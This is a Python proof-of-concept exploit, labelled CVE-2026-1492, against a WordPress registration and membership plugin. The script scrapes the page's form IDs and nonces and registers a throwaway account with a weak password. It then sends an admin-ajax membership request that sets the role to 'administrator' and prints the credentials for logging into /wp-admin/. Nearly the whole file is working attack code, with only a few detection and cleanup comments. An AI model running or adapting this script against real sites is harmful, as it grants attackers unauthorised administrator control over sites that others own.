import requests
import re
import random
import argparse
import textwrap
import json
from bs4 import BeautifulSoup
# =========================
# COLORS
# =========================
# ANSI SGR escape sequences used only for terminal colouring of the log helpers below.
GREEN = "\033[92m"   # bright green foreground
RED = "\033[91m"     # bright red foreground
YELLOW = "\033[93m"  # bright yellow foreground
RESET = "\033[0m"    # reset all attributes
def info(msg):
    """Print *msg* as an informational line, prefixed with a yellow ``[*]`` tag."""
    tag = f"{YELLOW}[*]{RESET}"
    # print's default separator supplies the single space after the tag
    print(tag, msg)
def success(msg):
    """Print *msg* as a success line, prefixed with a green ``[+]`` tag."""
    tag = f"{GREEN}[+]{RESET}"
    # print's default separator supplies the single space after the tag
    print(tag, msg)
def error(msg):
    """Print *msg* as an error line, prefixed with a red ``[-]`` tag."""
    tag = f"{RED}[-]{RESET}"
    # print's default separator supplies the single space after the tag
    print(tag, msg)
# =========================
# GENERATION USER
# =========================
# Throwaway identity for the account this script creates on the target.
# random.randint only keeps usernames from colliding between runs; nothing
# secret depends on it, so the non-cryptographic generator is fine here.
USERNAME = "user" + str(random.randint(1000, 9999))
EMAIL = USERNAME + "@gmail.com"  # the script never sends anything to this address
# Fixed, weak password: on a successful run the target is left with a
# guessable account — remove it once the test is finished.
PASSWORD = "pass"
# Field list serialised with json.dumps into the "form_data" member of the
# first admin-ajax request (see the REGISTER section in main).
form_data = [
    {"field_name": "user_login", "value": USERNAME, "field_type": "text", "label": "Username"},
    {"field_name": "user_email", "value": EMAIL, "field_type": "email", "label": "User Email"},
    {"field_name": "user_pass", "value": PASSWORD, "field_type": "password", "label": "User Password"},
    {"field_name": "user_confirm_password", "value": PASSWORD, "field_type": "password", "label": "Confirm Password"}
]
# =========================
# EXTRACTION TOKENS + MEMBERSHIP
# =========================
def extract_all(session: requests.Session, url: str) -> tuple:
    """Fetch the registration page and collect the values later requests need.

    Args:
        session: the ``requests.Session`` used for the GET, so any cookie the
            page sets is reused by the caller's later POSTs.
        url: the page that embeds the registration form.

    Returns:
        ``(form_id, frontend_nonce, security, wpnonce, membership_id)``.  Any
        value the page does not expose stays ``None``; nothing here checks the
        response status or that all five values were actually found.
    """
    r = session.get(url)  # status not checked; an error page simply yields Nones
    html = r.text
    soup = BeautifulSoup(html, "html.parser")
    form_id = None
    frontend_nonce = None
    security = None
    wpnonce = None
    membership_id = None
    # Hidden inputs carry the form id and the front-end nonce; the membership
    # id comes from a radio button.
    for inp in soup.find_all("input"):
        name = inp.get("name")
        value = inp.get("value")
        if value:  # inputs with an empty or missing value attribute are ignored
            if name == "ur-user-form-id":
                form_id = value
            if name == "ur_frontend_form_nonce":
                frontend_nonce = value
            # each matching radio overwrites the previous one, so the last
            # urm_membership radio in document order wins
            if inp.get("type") == "radio" and inp.get("name") == "urm_membership":
                membership_id = value
    # The two remaining values live in inline-script JS object literals.  Only
    # scripts mentioning them are kept, concatenated into one string (a script
    # naming both is appended twice; harmless, the first regex match is used).
    js_content = ""
    for script in soup.find_all("script"):
        content = script.string or script.get_text()
        if not content:
            continue
        if "user_registration_params" in content:
            js_content += content
        if "ur_membership_frontend_localized_data" in content:
            js_content += content
    # Non-greedy match ends at the first "});".  Should a string inside the
    # object ever contain that sequence, the captured JSON is truncated and
    # json.loads raises ValueError, which is not caught here.
    match = re.search(r'var user_registration_params = (\{.*?\});', js_content, re.DOTALL)
    if match:
        data = json.loads(match.group(1))
        security = data.get("user_registration_form_data_save")
    match = re.search(r'var ur_membership_frontend_localized_data = (\{.*?\});', js_content, re.DOTALL)
    if match:
        data = json.loads(match.group(1))
        wpnonce = data.get("_nonce")
    return form_id, frontend_nonce, security, wpnonce, membership_id
# =========================
# MAIN
# =========================
if __name__ == '__main__':
    # Entry point: one GET to harvest form id / nonces, then two POSTs to
    # admin-ajax.php (registration, then membership assignment).
    parser = argparse.ArgumentParser(
        description='CVE-2026-1492 Exploit',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent('''Example:
python3 poc.py -t http://localhost:5000 -ru http://localhost:5000/?page_id=6
''')
    )
    parser.add_argument('-t', '--target', required=True)  # site root; admin-ajax URL is built from it
    parser.add_argument('-ru', '--registration-url', required=True)  # page that embeds the registration form
    parser.add_argument('--debug', action='store_true', help='Show raw requests')
    args = parser.parse_args()
    # One session for all three requests, so cookies set by the GET in
    # extract_all are sent with both POSTs.
    session = requests.Session()
    # Headers shaped like a same-origin browser XHR; Origin/Referer are taken
    # verbatim from the command line.
    headers = {
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.9",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": args.target,
        "Referer": args.registration_url,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36",
        "X-Requested-With": "XMLHttpRequest"
    }
    # =========================
    # EXTRACTION
    # =========================
    info("Extracting tokens...")
    # None values are printed but not checked; a missing nonce still flows
    # into the requests below.
    form_id, frontend_nonce, security, wpnonce, membership_id = extract_all(session, args.registration_url)
    success(f"form_id: {form_id}")
    success(f"frontend_nonce: {frontend_nonce}")
    success(f"security: {security}")
    success(f"wpnonce: {wpnonce}")
    success(f"membership_id: {membership_id}")
    # =========================
    # REGISTER
    # =========================
    info("Sending registration request...")
    ajax_url = args.target + "/wp-admin/admin-ajax.php"  # plain concatenation: a trailing slash on --target doubles up
    payload1 = {
        "action": "user_registration_user_form_submit",
        "security": security,
        "form_data": json.dumps(form_data),
        "form_id": form_id,
        "registration_language": "en-US",
        "ur_frontend_form_nonce": frontend_nonce
    }
    r1 = session.post(ajax_url, headers=headers, data=payload1)
    try:
        r1_json = r1.json()
        if r1_json.get("success"):
            # A live account with the weak PASSWORD now exists on the target.
            success(f"User created: {USERNAME}")
        else:
            error("Registration failed")
    except:  # bare except also swallows KeyboardInterrupt; .json() raises ValueError
        error("Invalid response (not JSON)")
    # Note: execution continues to the membership step even when registration
    # failed or returned a non-JSON body.
    # =========================
    # MEMBERSHIP / EXPLOIT
    # =========================
    info("Sending membership request...")
    members_data = {
        # The client-chosen role is the crux of the issue: a server that trusts
        # this field grants the new account whatever role is named here.
        # Detection: admin-ajax.php POSTs whose action is the one in payload2
        # below and whose members_data carries "role": "administrator".
        "role": "administrator",
        "membership": membership_id,
        "payment_method": "free",
        "start_date": "2026-3-20",  # non-zero-padded month, sent verbatim
        "switched_currency": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t",  # whitespace-only filler, kept verbatim
        "urm_zone_id": "\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t",  # whitespace-only filler, kept verbatim
        "username": USERNAME
    }
    form_response = {
        "username": USERNAME,
        "success_message_positon": 1,  # key spelled as on the page; kept verbatim
        "redirect_timeout": 0,
        "form_login_option": "default",
        "registration_type": "membership"
    }
    payload2 = {
        "action": "user_registration_membership_register_member",
        "members_data": json.dumps(members_data),
        "form_response": json.dumps(form_response),
        "_wpnonce": wpnonce
    }
    r2 = session.post(ajax_url, headers=headers, data=payload2)
    try:
        r2_json = r2.json()
        if r2_json.get("success"):
            # "success" only means the server accepted the request; the role
            # actually assigned is not read back here, hence "possible".
            success("Membership applied → possible privilege escalation\n")
            info(f"Try logging in with:")
            print(f" Username: {USERNAME}")
            print(f" Password: {PASSWORD}\n")
            info(f"Then access:")
            print(f" {args.target}/wp-admin/")
        else:
            error("Membership failed")
    except:  # bare except also swallows KeyboardInterrupt; .json() raises ValueError
        error("Invalid response (not JSON)")
    # =========================
    # DEBUG
    # =========================
    if args.debug:
        # The request body includes the _wpnonce and username; treat the
        # debug output as sensitive when sharing logs.
        print("\n[DEBUG] Request body:")
        print(r2.request.body)
        print("\n[DEBUG] Response:")
        print(r2.text)